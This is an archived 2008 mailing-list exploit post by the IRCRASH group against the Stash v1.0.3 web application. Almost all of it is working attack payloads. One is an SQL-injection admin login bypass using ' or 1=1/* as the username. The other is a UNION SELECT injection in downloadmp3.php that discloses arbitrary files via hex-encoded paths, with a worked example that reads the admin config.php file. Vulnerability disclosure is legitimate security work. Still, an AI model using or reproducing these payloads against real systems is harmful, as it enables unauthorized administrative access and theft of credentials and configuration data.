Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[oCERT-2008-012] Horde, Popoon frameworks common input sanitization errors (XSS)

Multiple Vulnerabilities: LedgerSMB < 1.2.15

From:	r3d.w0rm_(at)_yahoo.com <r3d.w0rm_(at)_yahoo.com>
Date:	10.09.2008
Subject:	Stash v1.0.3 Admin bypass / Remote File Disclosure

#################################################################################
####
####           Stash v1.0.3 Admin bypass / Remote File Disclosure                ####
#################################################################################
####
#                                                                                  
 #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#################################################################################
####
#                                                                                  
 #
#Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
#                                                                                  
 #
#DORK : :(                                                                          #
#                                                                                  
 #
#################################################################################
####
#                                [Admin by pass]                                    #
#                                                                                  
 #
#http://Site/[path]/admin/login                                                     #
#Username : ' or 1=1/*                                                              #
#Password : R3d.W0rm                                                                #
#                                                                                  
 #
#################################################################################
####
#                            [Remote File Disclosure]                               #
#                                                                                  
 #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,
concat(0x[file name in
hex])/*
#                                                                                  
 #
#Note : You must enter file name in hex in valun address to download it .           #
#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870         #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,
concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/*
#                                                                                  
 #
#################################################################################
####
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################